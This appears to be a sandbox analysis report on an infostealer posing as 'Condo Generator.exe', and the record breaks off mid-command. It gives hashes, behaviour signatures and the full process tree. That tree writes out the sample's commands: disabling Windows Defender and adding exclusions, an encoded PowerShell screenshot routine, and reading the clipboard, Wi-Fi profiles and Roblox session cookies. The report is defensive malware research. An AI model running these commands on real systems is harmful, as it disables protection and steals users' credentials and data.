Resubmissions

06-12-2024 01:57

241206-cdq4batqfw 10

06-12-2024 01:53

241206-cazlaazlhl 10

Analysis

  • max time kernel
    6s
  • max time network
    11s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    06-12-2024 01:53

General

  • Target

    Condo Generator.exe

  • Size

    15.0MB

  • MD5

    1a3b0d3ffaed2d32a8f49fdea0e98843

  • SHA1

    7a6400763ebe091bef1e4ace1ee4037b8271a394

  • SHA256

    7ea9683e801974558e68504a1086cecd21797ae9a671e0d701ced7c36f3ba265

  • SHA512

    098dd7418996e1e6c23a846fc08397864a6222594015c1ea7cf0fe41bc93c8564b3ce992aecb13663c6044c056ab8ffb7aacb9da9295ea98b9c812d2353b1eeb

  • SSDEEP

    196608:9WHYdAlwfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/jj:HIHziK1piXLGVE4Ue0VJv

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 40 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Condo Generator.exe
    "C:\Users\Admin\AppData\Local\Temp\Condo Generator.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4400
    • C:\Users\Admin\AppData\Local\Temp\Condo Generator.exe
      "C:\Users\Admin\AppData\Local\Temp\Condo Generator.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1036
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Condo Generator.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3212
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Condo Generator.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2848
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2112
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1284
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Your condo has been generated', 0, 'Condo Generator', 48+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3436
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Your condo has been generated', 0, 'Condo Generator', 48+16);close()"
          4⤵
            PID:1984
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1208
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3276
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2060
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1964
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3080
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:4664
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1420
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:5020
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:752
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:688
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1188
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:2128
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ ‌ .scr'"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2740
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ ‌ .scr'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4420
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1828
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:3856
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1380
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:3640
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4228
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                4⤵
                  PID:3600
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                3⤵
                • Clipboard Data
                PID:4004
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-Clipboard
                  4⤵
                  • Clipboard Data
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2200
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                  PID:1056
                  • C:\Windows\system32\tasklist.exe
                    tasklist /FO LIST
                    4⤵
                    • Enumerates processes with tasklist
                    PID:2448
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:2012
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:3216
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                      3⤵
                      • System Network Configuration Discovery: Wi-Fi Discovery
                      PID:772
                      • C:\Windows\system32\netsh.exe
                        netsh wlan show profile
                        4⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:3124
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "systeminfo"
                      3⤵
                        PID:432
                        • C:\Windows\system32\systeminfo.exe
                          systeminfo
                          4⤵
                          • Gathers system information
                          PID:2980
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                        3⤵
                          PID:4720
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                            4⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2924
                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l3zf403b\l3zf403b.cmdline"
                              5⤵
                                PID:4864
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7196.tmp" "c:\Users\Admin\AppData\Local\Temp\l3zf403b\CSC17D53CC434C84326A87E9962D613B17.TMP"
                                  6⤵
                                    PID:2692
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:1016
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:3932
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:1124
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:2352
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      3⤵
                                        PID:4220
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          4⤵
                                            PID:1692
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:1564
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:1392
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:1928
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  4⤵
                                                    PID:560
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                  3⤵
                                                    PID:2184
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                      4⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:3504
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                    3⤵
                                                      PID:1944
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:4500
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "getmac"
                                                      3⤵
                                                        PID:4220
                                                        • C:\Windows\system32\getmac.exe
                                                          getmac
                                                          4⤵
                                                            PID:3252
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI44002\rar.exe a -r -hp"blank1234" "C:\Users\Admin\AppData\Local\Temp\E8Ntn.zip" *"
                                                          3⤵
                                                            PID:2952
                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI44002\rar.exe
                                                              C:\Users\Admin\AppData\Local\Temp\_MEI44002\rar.exe a -r -hp"blank1234" "C:\Users\Admin\AppData\Local\Temp\E8Ntn.zip" *
                                                              4⤵
                                                                PID:3924
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                              3⤵
                                                                PID:2916
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic os get Caption
                                                                  4⤵
                                                                    PID:3192
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                  3⤵
                                                                    PID:4868
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic computersystem get totalphysicalmemory
                                                                      4⤵
                                                                        PID:1636
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                      3⤵
                                                                        PID:4912
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic csproduct get uuid
                                                                          4⤵
                                                                            PID:4224
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                          3⤵
                                                                            PID:2712
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                              4⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:2756
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                            3⤵
                                                                              PID:2060
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic path win32_VideoController get name
                                                                                4⤵
                                                                                • Detects videocard installed
                                                                                PID:3584
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
